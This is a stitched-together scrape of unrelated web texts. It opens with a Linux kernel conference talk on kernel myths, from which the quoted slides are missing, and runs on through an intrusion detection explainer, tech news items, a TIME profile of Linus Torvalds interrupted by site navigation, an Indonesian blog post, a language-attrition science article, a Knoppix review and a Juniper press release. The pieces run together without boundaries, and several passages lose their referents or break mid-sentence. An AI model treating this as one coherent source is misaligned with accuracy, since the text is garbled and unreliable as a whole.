Myths, Lies, and Truths about the Linux kernel

Hi, as Dave said, I'm Greg, and I've been given the time by the people at OLS to talk to you for a bit about kernel stuff. I'm going to discuss the a number of different lies that people always say about the kernel and try to debunk them; go over a few truths that aren't commonly known, and discuss some myths that I hear repeated a lot.

Now when I mean a myth, I'm referring to something that was believed to have some truth to them, but when you really examine them, they are fictional. Let's call them the "urban myths" of the Linux kernel.

So, to start, let's look at a very common myth that really annoys me a lot:

Now I know that almost everyone involved in Linux has heard something like this in the past. About how Linux lacks device support, or really needs to support more hardware, or how we are lagging in the whole area of drivers. I've seen almost this same kind of quote from someone at OSDL a few months back, in my local paper, and it's extreme annoying.

This is really a myth, so people should really know better these days about saying this. So, who said this specific quote?:

Ick.

Ok, well, he probably said this a long time ago, back when Linux really didn't support many different things, and when "Plug & Play" was a big deal with ISA buses and stuff:

Ugh.

Ok, so maybe I need to spend some time and really debunk this myth as it really isn't true anymore.

So, what is the fact concerning Linux and devices these days. It's this:

Yes, that's right, we support more things than anyone else. And more than anyone else ever has in the past. Linux has a very long list of things that we have supported before anyone else ever did. That includes such things as:

• USB 2.0


• Bluetooth


• PCI Hotplug


• CPU Hotplug


• memory Hotplug (ok, some of the older Unixes did support CPU and memory hotplug in the past, but no desktop OS still supports this.)


• wireless USB


• ExpressCard

and the list can go on, the embedded arena is especially full of drivers that no one else supports.

But there's a real big part of the whole hardware support issue that goes beyond just specific drivers, and that's this:

Yes, we passed the NetBSD people a few years ago in the number of different processor families and types that we support now. No other "major" operating system even comes remotely close in platform support for what we have in Linux. Linux now runs in everything from a cellphone, to a radio controlled helicopter, your desktop, a server on the internet, on up to a huge 73% of the TOP500 largest supercomputers in the world.

And remember, almost every different driver that we support, runs on every one of those different platforms. This is something that no one else has ever done in the history of computing. It's just amazing at how flexible and how powerful Linux is this way.

We now have the most scalable and most supported operating system that has ever been created. We have achieved something that is so unique and different and flexible that for people to keep repeating the "Linux doesn't support hardware" myth, is something that everyone needs to stop repeating. As it simply isn't true anymore.

Now, to be fair to Jeff Jaffe, when he said that original quote, he had just become the CTO of Novell, and didn't really have much recent experience with Linux, and did not realize the real state of device support that the modern distros now provide.

Look at the latest versions of Fedora, SuSE, Ubuntu and others. Installation is a complete breeze (way easier than any other operating system installation). You can now plug a new device in and the correct driver is automatically loaded, no need to hunt for a driver disk somewhere, and you are up and running with no need to even reboot.

An example of this, I recently plugged a new USB printer into my laptop, and a dialog box popped up and asked me if I wanted to print a test page on it. That's it, nothing else. If that isn't "plug and play", I really don't know what is.

But not everyone has been ignoring the success of Linux, as is obvious by the size of this conference. Lots of people see Linux and want to use it for their needs, but when they start looking deeper into the kernel, and how it is developed almost the first thing they run into is the total lack of a plan:

This lots of people absolutely crazy all the time. You see questions like "Linux has no roadmap so how can I create a product with it", and "How does anyone get anything done since no one is directing anyone", and other things like this.

Well, obviously based on the fact that we are successful at doing something that's never been done before, we must have got here somehow, and be doing something right, but what is it?

Traditionally software is created by determining the requirements for it, writing up a big specification document, reviewing it and getting everyone to agree on it, implement the spec, test it, and so on. In college they teach software engineering methodology like the waterfall method, the iterative process method, formal proof methods, and others. Then there's the new ways of creating programs like extreme programming and top-down design, and so on.

So, what do we do here in the kernel?

Dr. Baba studies how businesses work and came to this conclusion after researching how the open source community works and specifically how the Linux kernel is developed and managed.

I guess it makes sense that since we have now created something that has never been done before, we did it by doing something different than anyone else. So, what is it? How is the kernel designed and created? Linus answered this question last year when he said the following to a group of companies when he was asked to explain the kernel design process:

This is a really important point that a lot of people don't seem to understand. Actually, I think they understand it, they just really don't like it.

The kernel is not developed with big design documents, feature requests and so on. It evolves over time based on the need at the moment for it. When it first started out, it only supported one type of processor, as that's all it needed to. Later, a second architecture was added, and then more and more as time went on. And each time we added a new architecture, the developers figured out only what was needed to support that specific architecture, and did the work for that. They didn't do the work in the very beginning to allow for the incredible flexibility of different processor types that we have now, as they didn't know what was going to be needed.

The kernel only changes when it needs to, in ways that it needs to change. It has been scaled down to tiny little processors when that need came about, and was scaled way up when other people wanted to do that. And every time that happened, the code was merged back into the tree to let everyone else benefit from the changes, as that's the license that the kernel is released under.

Jonathan on the first day of the conference showed you the huge rate of change that the kernel is under. Tons of new features are added at a gigantic rate, along with bug fixes and other things like cleanups. This shows how fast the kernel is still evolving, almost 15 years after it was created. It's morphed into this thing that is very adaptable and looks almost nothing like what it was even a few years ago. And that's the big reason why Linux is so successful, and why it will keep being successful. It's because we embrace change, and love it, and welcome it.

But one "problem" for a lot of people is that due to this constantly evolving state, the Linux kernel doesn't provide some things that "traditional" operating systems do. Things like an in-kernel stable API. Everyone has heard this one before:

For those of you who don't know what an API is, it is the description of how the kernel talks within itself to get things done. It describes things like what the specific functions are that are needed to do a specific task, and how those functions are called.

For Linux, we don't have a stable internal api, and for people to wish that we would have one is just foolish. Almost two years ago, the kernel developers sat down and wrote why Linux doesn't have an in-kernel stable API and published it within the kernel in the file:

If you have any questions please go read this file. It explains why Linux doesn't have a stable in-kernel api, and why it never will. It all goes back to the evolution thing. If we were to freeze how the kernel works internally, we would not be able to evolve in ways that we need to do so.

Here's an example that shows how this all works. The Linux USB code has been rewritten at least three times. We've done this over time in order to handle things that we didn't originally need to handle, like high speed devices, and just because we learned the problems of our first design, and to fix bugs and security issues. Each time we made changes in our api, we updated all of the kernel drivers that used the apis, so nothing would break. And we deleted the old functions as they were no longer needed, and did things wrong. Because of this, Linux now has the fastest USB bus speeds when you test out all of the different operating systems. We max out the hardware as fast as it can go, and you can do this from simple userspace programs, no fancy kernel driver work is needed.

Now Windows has also rewritten their USB stack at least 3 times, with Vista, it might be 4 times, I haven't taken a look at it yet. But each time they did a rework, and added new functions and fixed up older ones, they had to keep the old api functions around, as they have taken the stance that they can not break backward compatibility due to their stable API viewpoint. They also don't have access to the code in all of the different drivers, so they can't fix them up. So now the Windows core has all 3 sets of API functions in it, as they can't delete things. That means they maintain the old functions, and have to keep them in memory all the time, and it takes up engineering time to handle all of this extra complexity. That's their business decision to do this, and that's fine, but with Linux, we didn't make that decision, and it helps us remain a lot smaller, more stable, and more secure.

And by secure, I really mean it. A lot of times a security problem will be found in one driver, or in one core part of the kernel, and the kernel developers fix it, and then go and fix it up in all other drivers that have the same problem. Then, when the fix is released, all users of all drivers are now secure. When other operating systems don't have all of the drivers in their tree, if they fix a security problem, it's up to the individual companies to update their drivers and fix the problem too. And that rarely happens. So people who buy the device, and then use the older driver that comes in the box with the device, which is insecure. This has happened a lot recently, and really shows how having a stable api can actually hurt end users, when the original goal was to help developers.

What usually happens after I talk to people about the instability of the kernel api, and how kernel development works, they usually respond with:

This just is not true at all. We have a whole sub-architecture that only has 2 users in the world out there. We have drivers that I know have only one user, as there was only one piece of hardware ever made for it. It just isn't true, we will take drivers for anything into our tree, as we really want it.

We want more drivers, no matter how "obscure", because it allows us to see patterns in the code, and realize how we could do things better. If we see a few drivers doing the same thing, we usually take that common code and move it into a shared piece of code, making the individual drivers smaller, and usually fixing things up nicer. We also have merged entire drivers together because they do almost the same thing. An example of this is a USB data acquisition driver that we have in the kernel. There are loads of different USB data acquisition devices out in the world, and one German company send me a driver a while ago to support their devices. It turns out that I was working on a separate driver for a different company that did much the same thing. So, we worked together and merged the two together, and we now have a smaller kernel. That one driver turned out to work for a few other company's devices too, so they simply had to add their device id to the driver and never had to write any new code to get full Linux support. The original German company is happy as their devices are fully supported, which is what their customers wanted, and all of the other companies are very happy, as they really didn't have to do any extra work at all. Everyone wins.

The second thing that people ask me about when it comes to getting code into the kernel is, well, we want to keep our code private, because it is proprietary.

So, here's the simple answer to this issue:

That's it, it is very simple. I've had the misfortune of talking to a lot of different IP lawyers over the years about this topic, and every one that I've talked to all agree that there is no way that anyone can create a Linux kernel module, today, that can be closed source. It just violates the GPL due to fun things like derivative works and linking and other stuff. Again, it's very simple.

Now no lawyer will ever come out in public and say this, as lawyer really aren't allowed to make public statements like this at all. But if you hire one, and talk to them in the client/lawyer setting, they will advise you of this issue.

I'm not a lawyer, nor do I want to be one, so don't ask me anything else about this, please. If you have legal questions about license issues, talk to a lawyer, never bring it up on a public mailing list like linux-kernel, which only has programmers. To ask programmers to give legal rulings, in public, is the same as asking us for medical advice. It doesn't make sense at all.

But what would happen if one day the Linux kernel developers suddenly decided to let closed source modules into the kernel? How would that affect how the kernel works and evolves over time?

It turns out that Arjan van de Ven has written up a great thought exercise detailing exactly what would happen if this came true:

In his article, which can be found in the linux-kernel archives really easily, he described how only the big distros, Novell and Red Hat, would be able to support any new hardware that came out, but would slowly stagnate as they would not be allowed to change anything that might break the different closed source drivers. And then, if you loaded more than one closed source module, support for your system would pretty much be impossible. Even today, this is easily seen if you try to load more than one closed source module into your system, if anything goes wrong, no company will be willing to support your problem.

The article goes on to show how the community based distros, like Gentoo and Debian, would slowly become obsolete and not work on any new hardware platforms, and dry up as no users would be able to use them anymore. And eventually, in just a few short years, the whole kernel project itself would come to a standstill, unable to innovate or change anything.

It's a really chilling tale, and quite good, please go look it up if you are interested in this topic.

But there's one more aspect of the whole closed source module issue that I really want to bring up, and one that most people ignore. It's this:

Remember, no one forces anyone to use Linux. If you don't want to create a Linux kernel module, you don't have to. But if your customers are demanding it, and you decide to do it, you have to play by the rules of the kernel. It's that simple.

And the rule of the kernel is the GPL, it's a simple license, with standard copyright ownership issues, and many lawyers understand it.

When a company says that they need to "protect their intellectual property", that's fine, I and no other kernel developer has any objection to that. But by the same token, you need to respect the kernel developers intellectual property rights. We released our code under the GPL, which states in very specific form, exactly what your rights are when using this code. When you link other code into our body of code, you are obligated by the license of the kernel to also release your code under the same license (when you distribute it.)

When you take the Linux kernel code, and link or build with the header files against it, with your code, and not abide by the well documented license of our code, you are saying that for some reason your code is much more important than the entire rest of the kernel. In short, you are giving every kernel developer who has ever released their code the finger.

So remember, the individual companies are not more important than the kernel, for without the kernel development community, the companies would have no kernel to use at all. Andrew Morton stood up here two years ago and called companies who create closed source modules leaches. I completely agree. What they do is just totally unethical. Some companies try to skirt the license of the law on how they redistribute their closed source code, forcing the end user of it to do the building and linking, which then causes them to violate the GPL if they want to give that prebuilt module to anyone else. These companies are just plain unethical and wrong.

Luckily people are really starting to realize this and the big distros are not accepting this anymore. Here's what Novell publicly stated earlier this year:

This means that SuSE 10.1, and SLES and SLED 10 will not have any closed source kernel modules in it at all. This is a very good thing.

Red Hat also includes some text like this in their kernel package, but hasn't come out and said such a public statement.

Alright, enough depressing stuff. After companies realize that the really need to get their code into the kernel tree, they quickly run into one big problem:

This really isn't as tough of a problem as it first looks. Remember, the rate of change is about 6000 different patches a kernel release, so some one is getting their code into the tree.

So, how to do it. Luckily, the kernel developers have written down everything that you need to know for how to do kernel development. It's all in one file:

Please, point this file out to anyone who has questions on how to do kernel development. It answers about everything that anyone has ever asked, and points people at other places where the answers can be found.

It talks about how the kernel is developed, how to create a patch, how to find your way around the kernel tree, who to send patches to, what the different kernel trees are all about, and it even lists things you should never say on the linux-kernel mailing list if you expect people to take your code seriously.

It's a great file, and if you ever have anything that it doesn't help you out with, please let the author of that file know and they will work to add it. It should be the thing that you give to any manager or developer if they want to learn more about how to get their code into the kernel tree.

One thing that the HOWTO file describes, is various communities that can help people out with kernel development. If you are new to kernel development, there is the:

project. This is a very good wiki, a very nice and tame mailing list where you can ask basic questions without feeling bad, and there's also an IRC channel where you can ask questions in realtime to a lot of different kernel developers. If you are just starting out, please go here, it's a very good place to learn.

If you really want to start out doing kernel development, but don't know what to do, the:

project is an excellent place to start. They keep a long list of different "janitorial" tasks that the kernel developers have said it would be good to have done to the code base. You can pick from them, and learn the basics of how to create a patch, how to fix your email client to send a proper patch, and then, you get to see your name in the kernel changelog when your patches go in.

I really recommend this project for anyone who wants to start kernel development, but hasn't found anything specific to work on yet. It gets you to search around the kernel tree, fixing up odd things, and by doing that, you will usually find something that interests you that no one else is doing, and you can slowly start to take that portion of the kernel over. I can't recommend this group enough.

And then, there's the big huge mailing list, where everyone lives on:

This list gets about 200 emails a day to it, and can be hugely daunting to anyone trying to read it. Here's a hint, almost no one, except Andrew Morton, reads all of the emails on it. The rest of us just use filters, and read the things that interest them. I really suggest just finding some developers that you know provide interesting commentary, and reading the threads they respond to. Or just search for subjects that look interesting. But don't try to read everything, you'll just never get any other work done if you do that.

The Linux kernel mailing list also has another kind of perceived problem. Lots of people can find the reaction of developers on this list as very "harsh" at times. They post their code, and get back scathing reviews of everything they did wrong. Usually the reviewers only criticize the code itself, but for most people, this can be a very hard thing to be on the receiving end of. They just put out what they felt was a perfect thing, only to see it cut into a zillion tiny pieces.

The big problem of this, is we really only have a very small group of people reviewing code in the kernel community. Reviewing code is a hard, unrewarding, tough thing to do. It really makes you grumpy and rude in a very short period of time. I tried it out for a whole week, and at the end of it, I was writing emails like this one:

Other people who review code, aren't even as nice as I was here.

I'd like to publicly thank Christoph Hellwig and Randy Dunlap. Both of them spend a lot of time reviewing code on the linux-kernel mailing list, and Christoph especially has a very bad reputation for it. Bad in that people don't like his reviews. But the other kernel developers really do, because he is right. If he tells you something is wrong, and you need to fix it, do it. Don't ignore advice, because everyone else is watching to see if you really do fix up your code as asked to. We need more Christophs in the kernel community.

If everyone could take a few hours a week and review the different patches sent to the mailing list, it would be a great thing. Even if you don't feel like you are a very good developer, read other people's code and ask questions about it. If they can't defend their design and code, then there's something really wrong.

It's also a great way to learn more about programming and the kernel. When you are learning to play an instrument, you don't start out writing full symphonies on your own, you spend years reading other peoples scores, and learning how things are put together and work and interact. Only later do you start writing your own music, small tunes, and then, if you want, working up to bigger pieces. The same goes for programming. You can learn a lot from reading and understanding other people's code. Study the things posted, and ask why things are done specific ways, and point out problems that you have noticed. It's a task that the kernel really needs help with right now.

(possible side story about the quote)

Alright, but what if you want to help out with the kernel, but you aren't a programmer. What can you do? Last year Dave Jones told everyone that the kernel was going to pieces, with loads of bugs being found and no end in sight. A number of people made the response:

Now, this is true, it would be great to have a simple set of tests that everyone could run for every release to ensure that nothing was broken and that everything's just right. But unfortunately, we don't have such a test suite just yet. The only set of real tests we have, is for everyone to run the kernel on their machines, and to let us know if it works for them.

So, that's what I suggest for people who want to help out, yet are not programmers. Please, run the nightly snapshots from Linus's kernel tree on your machine, and complain loudly if something breaks. If no one pays attention, complain again. Be really persistent. File bugs in:

People do track things there. Sometimes it doesn't feel like it, but again, be persistent. If someone keeps complaining about something, we do feel bad, and work to try to fix things. Don't feel bad about being a pest, because we need more pests to keep all of us kernel developers in line.

And if you really feel brave, please, run Andrew Morton's -mm kernel tree. It contains all of the different kernel maintainer's development trees combined into one big mass of instability. It is the proving ground for what will eventually go into Linus's kernel tree. So we need people testing this kernel out to report problems early, before they go into Linus's tree.

I wouldn't recommend running Andrew's kernels on a machine with data that you care about, that would not be wise. So if you have a spare machine, or you have a very good backup policy, please, run his kernels and let us know if you have any problems with stuff.

So finally, in conclusion, here's the main things that I hope people remember:

What is IDS?

IDS is an acronym for Intrusion Detection System. An intrusion detection system detects intruders; that is, unexpected, unwanted or unauthorized people or programs on my computer network.

Why do I need IDS? A network firewall will keep the bad guys off my network, right? And my anti-virus will recognize and get rid of any virus I might catch, right? And my password-protected access control will stop the office cleaner trawling through my network after I've gone home, right? So that's it - I'm fully protected, right?

Wrong!

A firewall has got holes to let things through: without it, you wouldn't be able to access the Internet or send or receive emails. Anti-virus systems are only good at detecting viruses they already know about. And passwords can be hacked, stolen or left lying about on post-its.

That's the problem. You can have all this security, and all you've really got is a false sense of security. If anything or anyone does get through these defenses, through the legitimate holes, it or they can live on your network, doing whatever they want for as long as they want. And then there's a whole raft of little known vulnerabilities, known to the criminals, who can exploit them and gain access for fun, profit or malevolence. A hacker will quietly change your system and leave a back door so that he can come and go undetected whenever he wants. A Trojan might be designed to hide itself, silently gather sensitive information and secretly mail it back to source. And you won't even know it's happening - worse, you'll believe it can't be happening because you've got a firewall, anti-virus and access control.

Unless, that is, you also have an intrusion detection system. While those other defenses are there to stop bad things getting onto your network, an intrusion detection system is there to find and defeat anything that might just slip through and already be on your system. And in today's world, you really must assume that things will slip through - because they most certainly will. From the outside, you will be threatened by indiscriminate virus storms; from hackers doing it for fun (or training); and more worryingly from organized criminals specifically targeting you for extortion, blackmail or saleable trade secrets.

From the inside, you will have walk-in criminals using social engineering skills to obtain passwords to, or even use of, your own PCs; from curious staff who simply want to see what their colleagues are earning; and from malcontents with a grievance.

What you really mustn't assume is that this is fanciful, or that you don't have anything worth stealing. According to experts in the field even something as basic as stored HR data on your employees is worth $10 per person on the black market. Search for 'FBI' on this site, and see the variety of attacks and dangers that exist; and how often there is a degree of success despite firewalls and anti-virus and access control. You still need all of those defenses - but you also need an intrusion detection system.
What do I need in IDS?

Intrusion detection describes the intention - not the methodology. There are several different ways by which this can be achieved; so anything that detects intrusions is an IDS. Which method you choose really depends upon what you need: and if you don't already have in-house security expertise, it would be worth employing a consultant to help reach your decision.

Note that IDS is no longer a new technology - it's a mature technology. Since the term is no longer new, it no longer has that 'buzz' required by marketing managers. This has been aggravated by analyst firm the Gartner Group proclaiming that IDS is dead and replaced by IPS. This is wrong. Ignore it. IPS is different to IDS. Vend ors and security experts know this, but the result is that manufacturers are tempted to find new terms - and one of these is Network Behavior Analysis. This is a good and useful approach; but one of the primary purposes of NBA is to detect intrusions – in other words, IDS.

Remember, too, that good security is the right level of security for you. You need to strike the right balance between the cost of the security and the value of your goods - there's no point in spending more on security than the value of what you're protecting. Risk management principles using a thorough risk analysis will help you decide how much to spend.

Armed with this information, you can look for features such as:

* attack halting (stops the attack, whether it is a program or a hacker)
* attack blocking (closes the loop-hole through which the attacker gained access)
* attack alerting (either pop-up to an online admin, or email or SMS to a remote admin)
* information collecting (on what is done by the attack to the network, and from where the attack came - helps gather forensic evidence should a prosecution become necessary or possible)
* full reporting (so that you can learn from your mistakes, and prevent future problems)
* fail-safe features (such as encrypted messages and VPN tunneling within the IDS to hide its presence from, and inhibit interference by, any hacker).

If you've got a large network, or particularly valuable information, you may like to look out for the extras offered with some intrusion detection systems:

* honeypot or padded cell (a fake network or area designed specifically to attract and contain attacks, so that you can analyze them and learn from their behavior)
* vulnerability analysis (so that you can check your network for all known vulnerabilities in order to pre-empt rather than just detect intrusions)
* file integrity checker (a mathematical way of knowing if a file has been altered in any way, and therefore potentially compromised by an intruder)

One other point - don't think that you're so small you don't need or can't find an IDS. IDS as described above is available for large enterprises on down. But even if you just have a couple of PCs, you can still get, and still need, an intrusion detection system. It's just that for a single desktop system it goes by different names and has less automated features: it's a personal firewall and an anti-spyware program. The purpose is the same - to detect and stop intrusions - it's just that here you have to manually keep it up to date and manually conduct regular scans and it isn’t as intelligent or sophisticated.
Where do I get IDS?

Here are a few suppliers to get you started - but keep checking back to this resource center, because we'll be adding more companies and more products all the time:

* AirDefense
* Arbor Networks
* CounterStorm
* Enterasys
* GFI
* ISS
* Lancope
* Snort
* SonicWALL
* StillSecure

It will also be worth looking at Unified Threat Management. This is often a physical device, an appliance, and it just means that you get more than one security feature in a single box. Unified Threat Management will frequently include an IDS.
How can I evaluate IDS?

The first thing you need to do is to make sure that you know what you need, and what you can afford. Then you need to know what's available. Only then can you decide what to get. So first check the Buyer's Guide in this resource centre to see what you can get. Conduct a risk analysis exercise - use a consultant if you need to. And then, knowing what is available and what you need, consult our Comparison Guide and see what product comes closest to that need. And if you have specific queries, problems or worries - get some free help and advice from Ask the Experts .

Google Working To Make 'iPod/iTunes for Books'

nettamere writes to mention an initiative by Google to take the library online. The end result of the Google Book Search, the company hopes to see a future where they are not mearly referring customers to Amazon, but instead offering them the ability to download books directly. According to the Times Online, Google hopes to 'do for books what the iPod did for music'. From the article: "One of Google's partners, Evan Schnittman of Oxford University Press, said he foresaw a number of categories becoming popular downloads: 'Do you really want to go on holiday carrying four novels and a guide book?' The book initiative would be part of Google's Book Search service and its partnership with publishers, which will make books searchable online with publishers' approval. At present, only a sample of each book is available online."

Linus Torvalds

By giving away his software, the Finnish programmer earned a place in history

By PETER GUMBEL

Linus Torvalds was just 21 when he changed the world. Working out of his family's apartment in Helsinki in 1991, he wrote the kernel of a new computer operating system called Linux that he posted



Bono & Bob Geldof
Paul Wolfowitz describes the odd couple of advocacy
Václav Havel
He wrote the script for peaceful revolution, says Lou Reed
Christiane Amanpour
She makes the news make a difference
Giovanni Falcone & Paolo Borsellino
They fought the Mafia and paid with their lives
Anna Politkovskaya
Her commitment to the truth killed her
other stories »




Get The Magazine
Try 4 issues FREE
Get unlimited access to the TIME Archive and free delivery to your door
Give a gift of TIME

for free on the Internet — and invited anyone interested to help improve it.

Today, 15 years later, Linux powers everything from supercomputers to mobile phones around the world, and Torvalds has achieved fame as the godfather of the open-source movement, in which software code is shared and developed in a collaborative effort rather than being kept locked up by a single owner.

Some of Torvalds' supporters portray him as a sort of anti-Bill Gates, but the significance of Linux is much bigger than merely a slap at Microsoft. Collaborating on core technologies could lead to a huge reduction in some business costs, freeing up money for more innovative investments elsewhere. Torvalds continues to keep a close eye on Linux's development and has made some money from stock options given to him as a courtesy by two companies that sell commercial applications for it.

But his success isn't just measured in dollars. There's an asteroid named after him, as well as an annual software-geek festival. Torvalds' parents were student radicals in the 1960s and his father, a communist, even spent a year studying in Moscow. But it's their son who has turned out to be the real revolutionary.

Microsoft to Introduce VPN Tunneling Protocol

A new secure VPN tunneling protocol is cooking in the labs at Microsoft. The new form of VPN tunnel is called SSTP (Secure Socket Tunneling Protocol). Microsoft is scheduled to
introduce SSTP in Windows Vista Service Pack 1 and in Longhorn Server.

Currently, there are issues involving VPN connections in relation to PPTP GRE port blocking or L2TP ESP port blocking via a firewall or a NAT router, preventing the client to reach the server. Microsoft is laboring to deliver ubiquitous connectivity through VPN.

The Secure Socket Tunneling Protocol “will allow VPN tunnel connectivity across any scenarios i.e. behind NAT routers or firewalls or web proxies. And the best part of it - your end user remote access experience (like using RAS dialer) and network administration experience (like using RRAS server) remains same as before. i.e. SSTP based VPN tunnel just acts as a one more VPN tunnel that gets plugged into MS VPN client and VPN servers,” revealed Samir Jain, Lead Program Manager, RRAS, Windows Enterprise Networking, adding that the SSTP based VPN protocol will be made available as a beta together with Longhorn server Beta3.

Via the Secure Socket Tunneling Protocol (SSTP), the VPN tunnel will function over Secure-HTTP. In this manner, the problems with VPN connections based on the Point-to-Point Tunneling Protocol (PPTP) or Layer 2 Tunneling Protocol (L2TP) will be eliminated. Web proxies, firewalls and Network Address Translation (NAT) routers located on the path between clients and servers will no longer block VPN connections.

“The good part of SSTP is it integrates with MS RAS client/server infrastructure seamlessly. For example, SSTP supports password + strong user authentication (like smart-card, RSA securID, etc) using various PPP authentication algorithm. Other features of RAS (like generating profiles using connection manager administration kit, remote access policies, etc) - just works - similar to other PPTP/L2TP,” added Samir Jain.

Microsoft, Google Agree to NGO Code of Conduct

"Technology companies have come under fire for providing equipment or software that permits governments to censor information or monitor the online or offline activities of their citizens. For example, last year, Google's approach to the China market was criticized over its creation of a censored, local version of its search engine. Microsoft, Google, and two other technology companies will develop a code of conduct with a coalition of nongovernmental organizations (NGO) to promote freedom of expression and privacy rights, they announced Friday. The two companies along with Yahoo, and Vodafone Group said the new guidelines are the result of talks with Business for Social Responsibility (BSR) and the Berkman Center for Internet & Society at Harvard Law School."

Melangkah ke Depan

Jurnal Hidup Seorang yang Bernama Arthur

Itulah temanku yang baru membangun blognya kembali setelah ditinggalkannya blognya yang lama. Dan dengan bangganya mendeklarasikan dirinya yang sok merendah meninggikan mutu.... Loh kok jadi sewot gw ^_^ becanda thur.

Arthur pria putih kurus yang ternyata keturunan Manado-Cina-Bali ini (pura2 nya baru tau). Dengan wajahnya yang ganteng selalu didambakan wanita-wanita di sekitarnya. selain berperawakan menarik otak nya juga encer (ampe luber dan kopong, becanda lagi thur ^_^).

Udah ah males ngomongin arthur, bosen dari mata merem ampe merem lagi liatnya dia (ato emang karena gw sipit yah ;) Yah pokoknya Arthur adalah onyon, onyon adalah arthur.... apa lagi sih gw ... udah ah makin ngaco ajah gw.

Ngantuk blom tidur 2 hari, sibuk .... maen cewe ... loh kok, khan makin ngaco ajah khan. Blom tidurnya bener ... ngejar setoran coy.

Cukup sudah untuk hari ini ...... Melangkah ke depan .... tidur dulu .... zzzz...

Judge Rules That IBM Did Not Destroy Evidence

"From the latest in the SCO saga, Judge Wells ruled today that IBM did not destroy evidence as SCO claims. During discovery, SCO claims it found an IBM executive memo that ordered its programmers to delete source code, and so it filed a motion to prevent IBM from destroying more evidence. The actuality of the memo was less nefarious. An IBM executive wanted to ensure that the Linux developers were sandboxed from AIX/Dynix. So he ordered them to remove local copies of any AIX code from their workstations so that there would not be a hint of taint. The source code still existed in CVMC and was not touched. Since the source code was still in CMVC, Judge Wells ruled IBM did not destroy it. Incredulously, SCO's Mark James requested that IBM tell SCO how to obtain the information. IBM's Todd Shaughnessy responded that all during discovery (when IBM gave SCO a server with their CMVC database) SCO never once said that they were unable to find that information from CMVC. Judge Wells asked IBM to help SCO out in any way he could."

The Human Brain Must Forget the Mother Tongue When Learning a New Language

The process is named "first language attrition"

By: Stefan Anitei, Science Editor

After one year of scholarship in Spain, you surely master the language of the conquistadors like none around you, but why is everybody picking on you, saying you are boasting (believe me, I personally experienced something like this). In fact, people will be in the situation to find it hard to return to their native language.This phenomenon is named “first-language attrition” and puzzled researchers for a long time: how was it possible to forget, even momentarily, words you have used fluently all your life. Psychologist Benjamin Levy and Dr. Michael Anderson at University of Oregon found that this forgetting is not a passive fact, due to the simple disuse of the mother tongue language, but an active process inflicted by the brain itself that impedes us using words of the native language, which would make learning and speaking the new language harder. This forgetfulness is - in fact - an active adaptive strategy to better “catch” the second language. The researchers used native English speakers who had made at least one year of college level Spanish to answer repeatedly the name of various objects in Spanish. The more the students were using the Spanish words, the harder they found it to encounter the corresponding English labels for the objects. In fact, using the foreign language inhibits the corresponding labels in the native language, and appears as “first language attrition”. Nevertheless, the more fluent bilingual students were, far less prone to experience the attrition they were. Thus, “first language attrition” is a key factor during the initial stages of second language learning. When we begin to learn a new language, our brain starts to actively inhibit our easily accessible native language words while trying to imprint in our mind a new idiom. When bilingualism advances, the attrition turns less necessary, so the subjects in the study were better in shifting between the two languages. It may look paradoxical, but "first-language attrition provides a striking example of how it can be adaptive to (at least temporarily) forget things one has learned."

Knoppix 5.1.1: Now with eye candy

By: Dmitri Popov

The new year has brought a new release of the Knoppix live CD. Along with the usual updates to application software, the most noticeable change in version 5.1.1 is the inclusion of the Beryl 3-D desktop with the Emerald theming engine.

Since support for Beryl is still experimental, the 3-D desktop is provided in Knoppix as an option. To enable it, you have to use the knoppix desktop=beryl cheat code on boot. Considering the current status of Beryl, the new 3-D desktop works surprisingly well; it starts without any problems on a lowly Acer TravelMate 243 laptop with an Intel 82855 GM integrated graphics controller, and it feels snappy and is a joy to use. While some may consider the inclusion of Beryl in Knoppix a gimmick, it provides a great introduction to the whole 3-D desktop idea. Installing Beryl can be a tricky and time-consuming business, so the ability to try the fancy 3-D desktop with zero effort is a boon for all users looking for some Linux eye candy.

As usual, most software packages have also been updated. Knoppix 5.1.1 comes with KDE 3.5.5, GNOME 2.14 (available in the Knoppix DVD edition only), and OpenOffice.org 2.1. Following the recent Mozilla/Debian controversy, the Firefox browser and the Thunderbird email client have been replaced in Knoppix 5.1.1 with Iceweasel and Icedove respectively. Among useful software additions is the mkbootdev script, which allows you to create a bootable USB stick -- a handy tool for making a USB version of Knoppix. Of course, the most important software news in Knoppix 5.1.1 is without a doubt the inclusion of the latest Frozen Bubble game, which now supports multi-player network games.

Click to enlarge

Knoppix 5.1.1 also features a number of significant changes under the hood. The UnionFS file system has been replaced with aufs (Another UnionFS). According to the changelog, aufs is a more streamlined implementation of UnionFS that fixes many bugs still found in the original file system. The latest version of Knoppix comes with the NTFS-3G driver that offers full read/write operations on NTFS partitions. This makes Knoppix an even better tool for troubleshooting Windows-based machines.

As always, the new version of Knoppix comes in CD and DVD editions, which are available for download from mirrors listed at the Knoppix Web site. All in all, this release continues the fine tradition of delivering solid updates to the already great live CD Linux distro.

Dmitri Popov is a freelance writer whose articles have appeared in Russian, British, German, and Danish computer magazines.

Indonesia's Largest IP/MPLS Core Expands In NGN Rollout

PT Telkom Commits to M-Series Multiservice Platform for Advanced IP Services.

Siemens and Juniper Networks, Inc. today announced that PT Telkom, Indonesia’s leading telecommunications service provider, has further expanded its IP/MPLS-based core infrastructure with additional Juniper Networks M-series multiservice routing platforms including the M320. The upgrade, performed by Siemens, builds on PT Telkom’s existing M-series routers, deployed last year as part of an initial Next Generation Network (NGN) rollout. The new deployment spans 17 cities, connecting softswitch systems and legacy routers.

“After more than a year of intensive use, our earlier M-series deployment has demonstrated the superiority and flexibility of Juniper’s JUNOS Operating System,” said Mr. Abdul Haris, PT Telkom’s Director of Network and Solutions and the service provider’s Chief Technology Officer. “We were also impressed by the routers’ traffic engineering capability, strict QoS adherence even under extremely heavy load, and Juniper’s high availability features, such as fast reroute and in-service upgrading. We are confident to stay with Juniper and its routing solutions for our long-term NGN strategy.”

The M-series multiservice routers are part of the Juniper Networks family of best-of-class routing platforms which also include the market leading E-series Broadband Services Routers and T-series next-generation core routers. Juniper Networks E-, M- and T-series routing platforms deliver industry-leading levels of performance, reliability and scale to enable service providers to deliver high-quality voice, video, data and other advanced services over an IP/MPLS network with assured levels of performance and security. The T-series is the industry's most proven core routing platform and, with the multi-chassis TX Matrix technology, allows service providers to scale to multi-terabit rates without the risks associated with new and unproven technologies.

“Our M-series deployment at PT Telkom is a great example of the benefits of migrating to a next generation IP/MPLS-based infrastructure,” said Adam Judd, vice president of Asia Pacific for Juniper Networks. “Asia Pacific’s need for capacity to deliver advanced services – including VoIP, realtime video, broadband access, and VPN services – continues to grow, and service providers such as PT Telkom are leveraging Juniper’s industry leading platforms to address this demand and capture new revenue opportunities.”

